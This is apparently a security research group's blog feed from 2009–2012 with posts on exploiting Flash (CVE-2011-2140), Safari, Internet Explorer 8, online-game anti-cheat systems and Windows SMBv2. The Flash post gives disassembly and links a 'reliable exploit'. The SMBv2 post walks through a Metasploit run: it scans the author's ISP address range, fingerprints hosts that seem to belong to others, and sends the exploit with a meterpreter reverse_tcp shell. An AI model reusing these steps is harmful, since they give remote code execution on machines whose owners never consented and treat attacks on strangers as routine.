Abysssec Security Research » Uncategorized

Exploiting CVE-2011-2140 another flash player vulnerability

shahin — Tue, 31 Jan 2012 15:41:43 +0000

hello all .

before going future we are sorry to not update blog regularly, but it’s due to we are busy with stack of projects and also working on our expert training courses.

so as we didn’t post any blog post here we go with another flash player exploit we wrote long time ago.

1) Advisory information

Title : Adobe flash player memory overwrite exploit Version : <= 10.3.186.3 Discovery : http://www.zerodayinitiative.com/advisories/ZDI-11-276/ Vendor : http://adobe.com

Impact : Critical

Contact : info [at] abysssec.com

Twitter : @abysssec

2) Vulnerability Information

Class 1- Stack OverwriteImpactSuccessfully exploiting this issue allows remote attackers to gain code execution on vulnerable system

Remotely Exploitable

Yes

Locally Exploitable

Yes

3) Vulnerabilities detail

1- Stack overwrite vulnerability

Before we go deep into the vulnerability for understanding this vulnerability you should take a look at MP4 format and H.264/AVC data structures.The actual vulnerability occurs during processing data units in Sequence Parameter Set in MP4. Sub_1005B396 function, is responsible for processing Sequence Parameter Set. In this function pic_order_cnt_type from SPS will be check, if it’s equal with 1, other fields like data_pic_order_always_zero_flag , offset_for_non_ref_pic , offset_for_top_to_bottom_field will be initialize :

.text:1005B396 sub_1005B396 proc near ; CODE XREF: sub_1005B8DB+4Bp.text:1005B397 push ebp.text:1005B398 push esi.text:1005B399 push edi

.text:1005B39A mov edi, ecx

.text:1005B39C call sub_1005A95B

.text:1005B3A1 mov esi, [esp+10h+arg_0]

.text:1005B3A5 mov ecx, edi

.text:1005B3A7 mov [esi], al

…

.text:1005B47D mov ecx, edi

.text:1005B47F mov [esi+20h], eax

.text:1005B482 call sub_1005AA64

.text:1005B487 mov [esi+40h], eax

.text:1005B48A cmp eax, ebp à if( pic_order_cnt_type )

.text:1005B48C jnz short loc_1005B49D

…

.text:1005B49D loc_1005B49D: ; CODE XREF: sub_1005B396+F6j

.text:1005B49D xor ebx, ebx

.text:1005B49F inc ebx

.text:1005B4A0 cmp eax, ebx à if( pic_order_cnt_type == 1 )

.text:1005B4A2 jnz short loc_1005B4EF

.text:1005B4A4 mov ecx, edi

.text:1005B4A6 call sub_1005A99A à offset_for_top_to_bottom_field

.text:1005B4AB mov ecx, edi

.text:1005B4AD mov [esi+48h], al

.text:1005B4B0 call sub_1005AA93 à offset_for_non_ref_pic

.text:1005B4B5 mov ecx, edi

.text:1005B4B7 mov [esi+54h], eax

.text:1005B4BA call sub_1005AA93 à offset_for_top_to_bottom_field

Then the num_ref_frames_in_pic_order_cnt_cycle will be set and if it’s bigger than 0 the values in offset_for_ref_frame will be copied into buffer.

text:1005B4BF mov ecx, edi.text:1005B4C1 mov [esi+50h], eax.text:1005B4C4 call sub_1005AA64 à num_ref_frames_in_pic_order_cnt_cycle.text:1005B4C9 mov [esi+4Ch], eax

.text:1005B4CC test eax, eax

.text:1005B4CE jbe short loc_1005B4EF

.text:1005B4D0 lea eax, [esi+58h]

.text:1005B4D3 mov [esp+10h+arg_0], eax

.text:1005B4D7

.text:1005B4D7 loc_1005B4D7: à do{

.text:1005B4D7 mov ecx, edi

.text:1005B4D9 call sub_1005AA93 à offset_for_ref_frame[i]

.text:1005B4DE mov ecx, [esp+10h+arg_0]

.text:1005B4E2 add [esp+10h+arg_0], 4 à buf = &buf + 4

.text:1005B4E7 inc ebp à i++

.text:1005B4E8 mov [ecx], eax à buf = offset_for_ref_frame[i]

.text:1005B4EA cmp ebp, [esi+4Ch]

.text:1005B4ED jb short loc_1005B4D7 à } while(i < num_ref_frames_…)

You should got the vulnerability at this point. There is no boundary check for num_ref_frames_in_pic_order_cnt_cycle, so our data related to offset_for_ref_frame will be copy into the stack , that’s all .

2- Exploitation

Thanks to windows memory manager, browser and class of bug it’s not that hard to archive RCE. The only thing that should care about is return address. Because values which copied from MP4 file into stack, come with the changes. In other words, these values after reading from file will be decode and then are copied into stack. Values are copied into the buffer are generated from values in file into Signed Exp-Golomb code.After taking controll of EIP it’s easy to finish the job we used basic heap spray.

here is reliable exploit : CVE-2011-2140

happy hunting !

Exploit for CVE-2011-0222 Safari SVG Vulnerability

shahin — Tue, 26 Jul 2011 12:21:35 +0000

Hello all again

we are here with a patched vuln again and this time apple safari one .

actually it’s not that really odd to see your 0day got patched in vendor big patches and this time this happened to US too.

our safari vulnerability got patched and we decide to public our windows exploit + stand alone trigger without any pop up and finally a simple ROP to DEP bypass .

no more explanation this time check out exploit code.

http://www.abysssec.com/files/CVE-2011-0222_WinXP_Exploit.zip

http://www.exploit-db.com/sploits/CVE-2011-0222_WinXP_Exploit.zip

as always feel free to contact us : info [at] abysssec.com

follow @twitter for updates

cheers

Hacking / Exploiting / Cheating in Online Games

shahin — Mon, 21 Mar 2011 15:00:39 +0000

Hello to all readers.

we know that there are thousands and millions of online game players around and we guess lots of them may like to cheat this is our totally offensive research that we did to present in immunity infiltrate and as we missed that so here we go .

This research is about hacking /exploiting / cheating in online games and is sponsored by immunity.

This is a six part talk and contains:

Part I : introduction

Part II: Hacking Online Game Servers

Part III: Exploiting Online Games

Part IV: Cheating in Online games

Part V : Creating your own cheats

Part VI: Bypassing anti-cheat engines

Real world cheating is mainly focused on in this talk as it’s fun and legal.
During this talk we will have a tour into all the ways to manipulate an online game
and we will end up with bypassing the latest anti-cheating technologies and
manipulating the game to our heart’s desire.

Our case studies are:

1 -counter strike (half-life) as game:

2- SXE-Injected and Valve-anti cheat (VAC) as anti-cheat engines

Our codes will be release soon as soon we can but if you are hurry to use some cheats you can find almost all necessary codes in slides also there is two demos for proofing our research. We really enjoyed this research and it’s done from our side hope you enjoy too.

You can download slides here:

ppt : Exploiting-Online-Games

Font : in case if you have problem with embedded one

PDF : Exploiting-Online-Games

PS 1 : video demos are ready but due to those are huge we need to find a better way to compress them after that we will post them here.

PS 2 : Tools will be release after a while .

For getting updates about tools / videos please follow @abysssec in twitter.

For any question please contact:

Shahin [at] abysssec.com

For any other requirement please contact:

Info [at] abysssec.com

Kind Regards

Exploiting Internet Explorer 8 on Windows 7

shahin — Mon, 20 Dec 2010 23:03:40 +0000

hello all.

Our Demo is clear enough. maybe we release some more detail’s later.

[There is a video that cannot be displayed in this feed. Visit the blog entry to see the video.]

good luck

Exploiting Vista / 2008 Using SMBV2 Exploit

shahin — Fri, 02 Oct 2009 15:37:10 +0000

hello all

in a few recent days i worked on smbv2 ProcessID Function Table Dereference vulnerability and after lots of work actually i got my shell after kostya and rest of Immunity. but there is a good news for you Stephen Fewer finally released his exploit for metasploit too.

a note : stephen exploit is no so reliable refer to selecting address in HAL but it’s free …

metasploit 3.3 DEV have this module by default .

and here are steps for exploitation using metasploit

step 0:

run msfconsole.bat

step 1 :

scanning for targets
msf > use auxiliary/scanner/smb/smb2
msf auxiliary(smb2) > set RHOSTS xx.xx.xx.x-xx.xx.xx.254
RHOSTS =>xx.xx.xx.x-xx.xx.xx.254
msf auxiliary(smb2) > set THREADS 50
THREADS => 50
msf auxiliary(smb2) > run

for example i found on my ADSL range :

[*] xx.xx.xx.x supports SMB 2 [dialect 255.2] and has been online for 285 hours

step 2 :

now you need check version of founded target (i think it’s better to know before send your exploit)

msf auxiliary(smb2) > use auxiliary/scanner/smb/version
msf auxiliary(version) > set RHOSTS xx.xx.xx.x
RHOSTS => xx.xx.xx.x
msf auxiliary(version) > run

[*] xx.xx.xx.x is running Windows 7 Ultimate (Build 7100) (language: Unknown)
[*] Auxiliary module execution completed
msf auxiliary(version) > set RHOSTS xx.xx.xx.x
RHOSTS => xx.xx.xx.x
msf auxiliary(version) > run

[*] xx.xx.xx.x is running Windows 7 Ultimate (Build 7229) (language: Unknown)
[*] Auxiliary module execution completed
msf auxiliary(version) > set RHOSTS xx.xx.xx.x
RHOSTS => xx.xx.xx.x
msf auxiliary(version) > run

[*] xx.xx.xx.x is running Windows Vista Home Basic Service Pack 2 (language: Unknown)
[*] Auxiliary module execution completed

as you may noticed i just found one windows vista and two others are windows 7 .this exploit will work against vista sp1-2 and windows 2008 (not rc2)

step 3 :

now you can set and send exploit

msf auxiliary(version) > use exploit/windows/smb/smb2_negotiate_func_index
msf exploit(smb2_negotiate_func_index) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
set msf exploit(smb2_negotiate_func_index) > set LPORT 5678
LPORT => 5678
msf exploit(smb2_negotiate_func_index) > set LHOST xx.xx.xx.x
LHOST => xx.xx.xx.x
msf exploit(smb2_negotiate_func_index) > set RHOST xx.xx.xx.x
RHOST => xx.xx.xx.x
msf exploit(smb2_negotiate_func_index) > exploit

and here is output of metasploit exploit on my target :

note : i will try to have a technical detail post for exploitation and also my version of exploit for you soon.

happy hunting

shahin

xx.xx.xx.x